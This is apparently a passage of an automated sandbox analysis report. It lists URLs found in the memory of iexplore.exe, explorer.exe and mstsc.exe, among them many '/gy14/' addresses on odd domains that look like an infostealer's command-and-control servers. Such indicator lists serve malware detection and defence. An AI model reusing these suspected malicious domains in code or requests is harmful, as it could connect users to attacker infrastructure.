          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.com/gy14/www.vendorato.online
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.amiciperlacoda.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com/gy14/www.amiciperlacoda.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arrakis.com/_
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.arrakis.com/favicon.icoZ
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/www.accepted6.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/www.vendorato.online
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ask.com/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000005.00000003.3106960387.000000000C974000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3109005574.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3108691424.000000000C9A1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1769871733.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beautyloungebydede.online
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beautyloungebydede.online/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.beautyloungebydede.onlineReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.com/gy14/www.artbydianayorktownva.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.com/gy14/www.mtdiyx.xyz
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.biosif.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buflitr.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buflitr.com/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buflitr.com/gy14/www.venitro.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buflitr.comReferer:
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.camelpmkrf.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.camelpmkrf.com/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.camelpmkrf.com/gy14/www.mtdiyx.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.camelpmkrf.comReferer:
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cdiscount.com/#
          Source: iexplore.exe, 0000000E.00000002.4179072726.0000000006A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/
          Source: iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/$h
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.169cc.xyz
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.ampsportss.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.biosif.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.collline.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.yzyz841.xyz
          Source: explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyzReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtv.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtv.com/favicon.icoQ
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myspace.com/favicon.icoX
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myxtremecleanshq.services
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myxtremecleanshq.services/gy14/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myxtremecleanshq.services/gy14/www.883831.com
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.myxtremecleanshq.servicesReferer:
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.najdi.si/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4206940642.0000000011609000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.0000000005819000.00000004.10000000.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001AA49000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DEC9000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.00000000124C9000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naples.beauty
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4206940642.0000000011609000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000006.00000002.4162691903.0000000005819000.00000004.10000000.00040000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4156302014.000000001AA49000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4230395387.000000000DEC9000.00000004.00000001.00040000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4258424973.00000000124C9000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.naples.beauty/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naples.beauty/gy14/www.6733633.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naples.beautyReferer:
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.news.com.au/favicon.icoDj
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmp, msapplication.xml4.13.drString found in binary or memory: http://www.nytimes.com/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orange.fr/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ozon.ru/favicon.icoxx
